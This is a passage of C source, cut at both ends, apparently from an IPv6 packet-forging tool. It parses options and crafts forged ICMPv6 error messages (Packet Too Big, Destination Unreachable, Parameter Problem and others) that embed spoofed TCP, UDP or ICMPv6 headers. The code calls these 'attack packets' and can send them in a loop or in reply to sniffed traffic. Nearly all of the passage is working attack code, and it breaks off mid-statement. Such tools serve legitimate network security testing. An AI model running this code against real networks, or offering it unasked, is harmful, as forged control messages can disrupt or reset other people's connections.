nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'r': /* Target address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Redirected Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &targetaddr) <= 0){ puts("inet_pton(): Redirected Address not valid"); exit(EXIT_FAILURE); } targetaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ redirpreflen = atoi(charptr); if(redirpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&targetaddr, redirpreflen); redirprefix_f=1; } break; case 't': /* ICMPv6 Type and Code */ if((charptr = strtok_r(optarg, ":", &lasts)) == NULL){ puts("Error in ICMPv6 message Type/Code"); exit(EXIT_FAILURE); } icmp6type= atoi(charptr); icmp6type_f=1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ icmp6code= atoi(charptr); icmp6code_f=1; } break; case 'e': /* ICMPv6 Destination Unreachable */ icmp6type= 1; icmp6type_f= 1; icmp6code= atoi(optarg); icmp6code_f= 1; break; case 'E': /* ICMPv6 Packet Too Big */ icmp6type= 2; icmp6type_f= 1; icmp6code= 0; icmp6code_f= 1; break; case 'A': /* ICMPv6 Time Exceeded */ icmp6type= 3; icmp6type_f= 1; icmp6code= atoi(optarg); icmp6code_f= 1; break; case 'R': /* ICMPv6 Parameter Problem */ icmp6type=4; icmp6type_f= 1; icmp6code= atoi(optarg); icmp6code_f= 1; break; case 'm': /* Next-Hop MTU (for ICMPv6 PTB messages) */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'MTU' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ mtu = ul_res; mtu_f=1; } break; case 'O': /* Pointer (for ICMPv6 "Parameter Problem" messages) */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'Pointer' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ pointer = ul_res; pointer_f=1; } break; case 'p': /* Protocol used in the ICMPv6 Payload */ if(strcmp(optarg, "TCP") == 0) rhtcp_f = 1; else if(strcmp(optarg, "ICMP6") == 0) rhicmp6_f = 1; else if(strcmp(optarg, "UDP") == 0) rhudp_f = 1; else if(strcmp(optarg, "IP6") == 0){ rhip6_f= 1; } else{ puts("Unsupported protocol in option '-p'"); exit(EXIT_FAILURE); } break; case 'P': /* Payload Size*/ rhlength= atoi(optarg); rhlength= (rhlength<<3) >> 3; /* The Redirected Header has a granularity of 8 bytes */ rhlength_f= 1; break; case 'n': /* No ICMPv6 Payload */ nopayload_f=1; break; case 'C': /* Hop Limit of the IPv6 Payload */ ip6hoplimit= atoi(optarg); ip6hoplimit_f=1; break; case 'x': /* Source Address of the ICMPv6 payload */ if( inet_pton(AF_INET6, optarg, &peeraddr) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } peeraddr_f = 1; break; case 'o': /* Target port */ if((charptr = strtok_r(optarg, ":-", &lasts)) == NULL){ printf("Error in TCP/UDP target port"); exit(EXIT_FAILURE); } targetportl= atoi(charptr); targetportl_f= 1; if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ targetporth= targetportl; } else{ targetporth=atoi(charptr); targetporth_f=1; if(targetportl > targetporth){ auxint16= targetportl; targetportl= targetporth; targetporth= auxint16; } } break; case 'a': /* Peer port */ if((charptr = strtok_r(optarg, ":-", &lasts)) == NULL){ printf("Error in TCP/UDP peer port"); exit(EXIT_FAILURE); } peerportl= atoi(charptr); peerportl_f= 1; if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ peerporth= peerportl; } else{ peerporth=atoi(charptr); peerporth_f=1; if(peerportl > peerporth){ auxint16= peerportl; peerportl= peerporth; peerporth= auxint16; } } break; case 'X': /* TCP flags */ charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=1; break; case 'q': /* TCP Sequence Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpseq = ul_res; tcpseq_f=1; } break; case 'Q': /* TCP Acknowledgement Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpack = ul_res; tcpack_f=1; } break; case 'V': /* TCP Urgent Pointer */ tcpurg= atoi(optarg); tcpurg_f= 1; break; case 'w': /* TCP Window */ tcpwin= atoi(optarg); tcpwin_f=1; break; case 'M': /* Respond to multicast packets */ respmcast_f=1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'f': /* Sanity filters */ sanityfilters_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("icmp6 needs root privileges to run."); exit(EXIT_FAILURE); } if(listen_f && !idata.iface_f){ puts("Must specify a network interface with the -i option when listening mode is selected"); exit(EXIT_FAILURE); } if(listen_f && loop_f){ puts("'Error: listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } if(!idata.dstaddr_f && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); srandom(time(NULL)); if(sanityfilters_f){ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many Source Address (block) filters while adding sanity filters."); exit(EXIT_FAILURE); } filters.blocksrc[filters.nblocksrc]= idata.srcaddr; filters.blocksrclen[filters.nblocksrc]=128; filters.nblocklinksrc++; } if(!sleep_f) nsleep=1; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else max_packet_size = ETH_DATA_LEN; if(!nopayload_f && !(rhtcp_f || rhudp_f || rhicmp6_f)) rhdefault_f=1; if(!ip6hoplimit_f) ip6hoplimit=64+random()%180; if(!ip6length_f) ip6length=1460; if(!targetaddr_f) targetaddr= idata.dstaddr; if(!peeraddr_f){ if( inet_pton(AF_INET6, "::", &randprefix) <= 0){ puts("inet_pton(): Error while randomizing Destination Address of the ICMPv6 payload"); exit(EXIT_FAILURE); } randpreflen=0; randomize_ipv6_addr(&peeraddr, &randprefix, randpreflen); } if(rhtcp_f || rhdefault_f){ if(!tcpflags_f) tcpflags= tcpflags | TH_ACK; if(!tcpack_f) tcpack= random(); if(!tcpseq_f) tcpseq= random(); if(!tcpwin_f) tcpwin= ((u_int16_t) random() + 1500) & (u_int16_t)0x7f00; if(!peerportl_f){ peerportl= random(); peerporth= peerportl; } if(!targetportl_f){ targetportl= random(); targetporth= targetportl; } if(!tcpurg_f) tcpurg= 0; } if(rhudp_f){ if(!peerportl_f){ peerportl= random(); peerporth= peerportl; } if(!targetportl_f){ targetportl= random(); targetporth= targetportl; } } if(rhicmp6_f){ if(!icmp6id_f) icmp6id= random(); if(!icmp6seq_f) icmp6seq= random(); } if(!icmp6type_f){ icmp6type= ICMP6_PARAM_PROB; icmp6code= ICMP6_PARAMPROB_HEADER; } switch(icmp6type){ case ICMP6_PACKET_TOO_BIG: if(!mtu_f) mtu= 296; break; case ICMP6_PARAM_PROB: if(pointer_f) pointer= random()%40; break; case ICMP6_DST_UNREACH: case ICMP6_TIME_EXCEEDED: default: break; } if(rhtcp_f){ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_TCPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } else if(rhudp_f){ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_UDPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } else if(rhicmp6_f){ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } } else if(pcap_compile(idata.pfd, &pcap_filter, PCAP_IPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire an ICMPv6 error message if an IPv6 Destination Address was specified */ if(idata.dstaddr_f){ send_packet(&idata, NULL, NULL); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f){ if(idata.verbose_f) printf("Now sending ICMPv6 error messages every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata, NULL, NULL); } exit(EXIT_SUCCESS); } } if(listen_f){ if(idata.verbose_f){ print_filters(&idata, &filters); if(rhtcp_f){ puts("Listening to incoming TCP packets..."); } else if(rhudp_f){ puts("Listening to incoming UDP packets..."); } else if(rhicmp6_f){ puts("Listening to incoming ICMPv6 packets..."); } else{ puts("Listening to incoming IPv6 packets..."); } } if( (idata.fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); while(listen_f){ rset= sset; if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* Read a Neighbor Solicitation message */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + linkhsize); accepted_f=0; if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Neighbor Advertisement */ send_packet(&idata, pktdata, pkthdr); } exit(EXIT_SUCCESS); } if(!idata.dstaddr_f && !listen_f){ puts("Error: Nothing to send! (key parameters left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB && idata->type != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ idata->mtu)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); exit(EXIT_FAILURE); } /* We prepare a separate Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct icmp6_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 header (should be using Frag. option?)"); exit(EXIT_FAILURE); } icmp6= (struct icmp6_hdr *) ptr; icmp6->icmp6_type = icmp6type; icmp6->icmp6_code = icmp6code; switch(icmp6type){ case ICMP6_PACKET_TOO_BIG: icmp6->icmp6_mtu= htonl(mtu); break; case ICMP6_PARAM_PROB: icmp6->icmp6_pptr=htonl(pointer); break; case ICMP6_TIME_EXCEEDED: case ICMP6_DST_UNREACH: default: icmp6->icmp6_data32[0]=0; break; } ptr += sizeof(struct icmp6_hdr); startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ if(pktdata != NULL){ /* Sending a Redirect in response to a received packet */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); /* If the IPv6 Source Address of the incoming Neighbor Solicitation is the unspecified address (::), the Neighbor Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Neighbor Advertisement is sent to the IPv6 Source Address (and Ethernet Source Address) of the incoming Neighbor Solicitation message */ pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address. */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ return; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; if(idata->type == DLT_EN10MB && idata->type != IFACE_LOOPBACK) ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* We respond to packets sent to a multicast address only if the tool has been explicitly instructed to do so. */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr) && !respmcast_f) return; } targetport= targetportl; do{ peerport= peerportl; do{ ptr=startofprefixes; /* We include a Redirected Header by default */ if(!nopayload_f){ /* The amount of data that we include in the Redirected Header depends on a number of factors: a) If a specific amount has been specified, we include up to that amount of data (i.e., provided it is available from the captured packet) b) If our packet has not yet exceeded the minimum IPv6 MTU (1280 bytes), we include as many bytes as possible without exceeding that size. c) If our packet already exceeds the minimum IPv6 MTU, we include at most 68 bytes */ if(pktdata != NULL){ if(rhlength_f){ rhbytes= rhlength; } else{ currentsize= ptr - (unsigned char *)ipv6; if(currentsize > 1280) rhbytes=48; else rhbytes= 1280- currentsize; } pktbytes= pkthdr->caplen; if( rhbytes > pktbytes) rhbytes= pktbytes; rhbytes= (rhbytes>>3) << 3; if( (ptr+rhbytes) > (v6buffer+max_packet_size)){ puts("Packet Too Large while inserting ICMPv6 payload"); exit(EXIT_FAILURE); } bcopy(pkt_ipv6, ptr, rhbytes); ptr+= rhbytes; } else{ /* The ICMPv6 Error is *not* being sent in response to a received packet */ if(rhlength_f){ rhbytes= rhlength; } else{ currentsize= ptr - (unsigned char *)ipv6; if(currentsize > 1280) rhbytes=48; else rhbytes= 1280- currentsize; } rhbytes= (rhbytes>>3) << 3; if( (ptr+rhbytes) > (v6buffer+max_packet_size)){ puts("Packet Too Large while inserting Redirected Header Option"); exit(EXIT_FAILURE); } rhipv6 = (struct ip6_hdr *) rhbuff; rhipv6->ip6_flow= 0; rhipv6->ip6_vfc= 0x60; rhipv6->ip6_plen= htons(ip6length); rhipv6->ip6_hlim= ip6hoplimit; rhipv6->ip6_src= targetaddr; rhipv6->ip6_dst= peeraddr; if(rhtcp_f || rhdefault_f){ rhipv6->ip6_nxt= IPPROTO_TCP; rhtcp= (struct tcp_hdr *) (rhbuff + sizeof(struct ip6_hdr)); bzero(rhtcp, sizeof(struct tcp_hdr)); rhtcp->th_sport= htons((u_int16_t) targetport); rhtcp->th_dport= htons((u_int16_t) peerport); rhtcp->th_seq = htonl(tcpseq); rhtcp->th_ack= htonl(tcpack); rhtcp->th_flags= tcpflags; rhtcp->th_urp= htons(tcpurg); rhtcp->th_win= htons(tcpwin); rhtcp->th_off= MIN_TCP_HLEN >> 2; rhtcp->th_sum = random(); if(rhbytes <= (MIN_IPV6_HLEN + MIN_TCP_HLEN)){ bcopy(rhbuff, ptr, rhbytes); ptr+= rhbytes; } else{ bcopy(rhbuff, ptr, MIN_IPV6_HLEN+MIN_TCP_HLEN); ptr += MIN_IPV6_HLEN+MIN_TCP_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_TCP_HLEN; while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } } } else if(rhudp_f){ rhipv6->ip6_nxt= IPPROTO_UDP; rhudp = (struct udp_hdr *) (rhbuff + sizeof(struct ip6_hdr)); rhudp->uh_sport= htons(targetport); rhudp->uh_dport= htons(peerport); rhudp->uh_ulen= rhipv6->ip6_plen; rhudp->uh_sum= random(); if(rhbytes <= (MIN_IPV6_HLEN + MIN_UDP_HLEN)){ bcopy(rhbuff, ptr, rhbytes); ptr+= rhbytes; } else{ bcopy(rhbuff, ptr, MIN_IPV6_HLEN+MIN_UDP_HLEN); ptr += MIN_IPV6_HLEN+MIN_UDP_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_UDP_HLEN; while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } } } else if(rhicmp6_f){ rhipv6->ip6_nxt= IPPROTO_ICMPV6; rhicmp6 = (struct icmp6_hdr *) (rhbuff + sizeof(struct ip6_hdr)); rhicmp6->icmp6_type = ICMP6_ECHO_REQUEST; rhicmp6->icmp6_code = 0; rhicmp6->icmp6_cksum = random(); rhicmp6->icmp6_data16[0]= random(); /* Identifier */ rhicmp6->icmp6_data16[1]= random(); /* Sequence Number */ if(rhbytes <= (MIN_IPV6_HLEN + MIN_ICMP6_HLEN)){ bcopy(rhbuff, ptr, rhbytes); ptr+= rhbytes; } else{ bcopy(rhbuff, ptr, MIN_IPV6_HLEN+MIN_ICMP6_HLEN); ptr += MIN_IPV6_HLEN+MIN_ICMP6_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_ICMP6_HLEN; while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } } } } } icmp6->icmp6_cksum = 0; icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, 